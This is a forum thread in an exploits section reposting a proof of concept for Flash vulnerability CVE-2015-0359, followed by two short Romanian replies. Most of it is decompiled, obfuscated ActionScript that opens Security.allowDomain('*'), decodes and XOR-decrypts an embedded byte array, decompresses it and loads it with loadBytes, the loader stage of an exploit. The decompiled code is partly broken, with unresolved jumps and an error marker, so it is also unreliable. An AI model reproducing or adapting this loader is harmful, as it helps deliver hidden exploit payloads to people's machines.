Jump to content
Nytro

Flash_Exploit.SWF CVE-2015-0359 PoC

By Nytro, in Exploituri

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

Flash_Exploit.SWF CVE-2015-0359 PoC

BY: _D3F4ULT

package { 
    public class $1$6$7$@120984$cQhWvZ56 {

    }
    $1$6$7$@120984$cQhWvZ56 = [OP_NEWCLASS ClassInfo:0 base:Object];
    34643$OfA2FuRBJ#@ = [OP_NEWCLASS ClassInfo:1 base:MovieClip];
    3m3qT@@9jm4 = [OP_NEWCLASS ClassInfo:2 base:Object];
    6KovfYYrEFkW = [OP_NEWCLASS ClassInfo:3 base:ByteArray];
}//package

import flash.display.*;
import flash.system.*;
import flash.utils.*;

package {
    public class 34643$OfA2FuRBJ#@ extends MovieClip {

        private var 13AFv7jyfFP;
        private var YWH9DbQhT:Class;
        private var 65%$uHPix2Gq4k%ss = "ToStage";
        private var _StrPool46:uint = 0;
        private var %%Awjftgdfe^&:uint = 0;
        private var X4O3S0e:uint = 0xFF;
        private var 3eMXkL2fIA;
        private var 86OI8FG3RS4;

        public function 34643$OfA2FuRBJ#@(_arg1:Object=null){
            Security[((("al" + "low") + "Dom") + "ain")]("*");
            var _local2:* = ApplicationDomain[(("current" + "Do") + "main")];
            this.65%$uHPix2Gq4k%ss = (("ad" + "ded") + this.65%$uHPix2Gq4k%ss);
            var _local4 = (_local2[("getD" + "efinition")]("flash.display.Loader") as Class);
            this.13AFv7jyfFP = new (_local4)();
            this.YWH9DbQhT = (_local2[("getD" + "efinition")]("flash.utils.ByteArray") as Class);
            if (this["stage"]){
                this.4kjf1flZV1ZTA7();
            } else {
                this["addEventListener"](this.65%$uHPix2Gq4k%ss, this.4kjf1flZV1ZTA7);
            };
        }
        public function EmptyHandler(_arg1:Object, _arg2:int):void{
            _arg2++;
        }
        private function 4kjf1flZV1ZTA7(_arg1:Object=null):void{
            this[(("rem" + "oveEven") + "tListener")](this.65%$uHPix2Gq4k%ss, this.4kjf1flZV1ZTA7);
            this["addEventListener"]("enterFrame", this.TVN3N5UQ);
            var _local2:* = new 6KovfYYrEFkW();
            var _local3:* = new this.YWH9DbQhT();
            this.$$!!323tr();
            this.ym9LDy3rDi8Fz(_local2, _local2["length"], _local3);
            this.gzZrsob66e0cB6oT(_local3);
            var _local4:uint = 91;
            var _local5 = 0;
            if ((_local5 < _local3["length"])){
                var _local6:uint = (_local3[_local5] ^ _local4);
                _local4 = _local3[_local5];
                _local3[_local5] = _local6;
                _local5++;
                //unresolved jump
            };
            var _local8 = "com";
            _local3[((("un" + _local8) + "pres") + "s")]();
            this.13AFv7jyfFP[("load" + "Bytes")](_local3);
            this[("add" + "Child")](this.13AFv7jyfFP);
            //unresolved jump
            !ERROR!            return;
        }
        private function TVN3N5UQ(_arg1):void{
            if ((this.currentFrame == 200)){
                this.gotoAndPlay(new Number(2));
                return;
            };
        }
        private function $$!!323tr():void{
            this.3eMXkL2fIA = new this.YWH9DbQhT();
            this.86OI8FG3RS4 = new this.YWH9DbQhT();
            var _local2:int;
            _local2 = 65;
            if ((_local2 < 91)){
                this.86OI8FG3RS4["writeByte"](_local2);
                _local2++;
                //unresolved jump
            };
            _local2 = 97;
            if ((_local2 < 123)){
                this.86OI8FG3RS4["writeByte"](_local2);
                _local2++;
                //unresolved jump
            };
            _local2 = 48;
            if ((_local2 < 58)){
                this.86OI8FG3RS4["writeByte"](_local2);
                _local2++;
                //unresolved jump
            };
            _local2 = 33;
            if ((_local2 < 48)){
                if ((((((_local2 == 34)) || ((_local2 == 39)))) || ((_local2 == 45)))){
                } else {
                    this.86OI8FG3RS4["writeByte"](_local2);
                };
                _local2++;
                //unresolved jump
            };
            _local2 = 58;
            if ((_local2 < 65)){
                this.86OI8FG3RS4["writeByte"](_local2);
                _local2++;
                //unresolved jump
            };
            _local2 = 91;
            if ((_local2 < 97)){
                if ((_local2 == 92)){
                } else {
                    this.86OI8FG3RS4["writeByte"](_local2);
                };
                _local2++;
                //unresolved jump
            };
            _local2 = 123;
            if ((_local2 < 127)){
                this.86OI8FG3RS4["writeByte"](_local2);
                _local2++;
                //unresolved jump
            };
            this.86OI8FG3RS4["writeByte"](34);
            var _local3:int;
            _local3 = 0;
            if ((_local3 < 0xFF)){
                this.3eMXkL2fIA[_local3] = 0xFF;
                _local3++;
                //unresolved jump
            };
            _local3 = 0;
            if ((_local3 < this.86OI8FG3RS4["length"])){
                this.3eMXkL2fIA[this.86OI8FG3RS4[_local3]] = _local3;
                _local3++;
                //unresolved jump
            };
        }
        public function gzZrsob66e0cB6oT(_arg1):uint{
            var _local2:uint = 0;
            if (!((this.X4O3S0e == 0xFF))){
                _arg1[_arg1["length"]] = (this._StrPool46 | (this.X4O3S0e << this.%%Awjftgdfe^&));
                _local2 = (_local2 + 1);
            };
            return (_local2);
        }
        public function ym9LDy3rDi8Fz(_arg1, _arg2:uint, _arg3):uint{
            var _local4 = 0;
            var _local5:uint = 0;
            _local4 = 0;
            if ((_local4 < _arg2)){
                if ((this.3eMXkL2fIA[_arg1[_local4]] == 0xFF)){
                } else {
                    if ((this.X4O3S0e == 0xFF)){
                        this.X4O3S0e = this.3eMXkL2fIA[_arg1[_local4]];
                    } else {
                        this.X4O3S0e = (this.X4O3S0e + (this.3eMXkL2fIA[_arg1[_local4]] * this.86OI8FG3RS4["length"]));
                        this._StrPool46 = (this._StrPool46 | (this.X4O3S0e << this.%%Awjftgdfe^&));
                        this.%%Awjftgdfe^& = (this.%%Awjftgdfe^& + ((((this.X4O3S0e & 8191) > 88)) ? 13 : 14));
                        var _local7 = _local5;
                        _local5 = (_local7 + 1);
                        _arg3[_local7] = (this._StrPool46 & 0xFF);
                        this._StrPool46 = (this._StrPool46 >> 8);
                        this.%%Awjftgdfe^& = (this.%%Awjftgdfe^& - 8);
                        //unresolved if
                        this.X4O3S0e = 0xFF;
                    };
                };
                _local4++;
                //unresolved jump
            };
            return (_local5);
        }

    }
}//package

package {
    public class 3m3qT@@9jm4 {

    }
}//package

package {
    public class 6KovfYYrEFkW extends ByteArray {

        public function 9IRh0mi4XOG():void{
        }
        public function A3Ig1if():int{
            return (0);
        }

    }
}//package


"twitter.com/_d3f4ult"

Via: http://pastebin.com/5nnP7X0x

gogusan Newbie

gogusan

Posted
Posted
Doamne .... nu vad nicio informatie cum se foloseste

Nu e pentru oricine. Unde activezi aici pe forum? La gamehacks>> silent aimuri?

Ce inseamna pentru tine?:

import flash.display.*;
import flash.system.*;
import flash.utils.*;

Pentru noi inseamna ActionScript.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...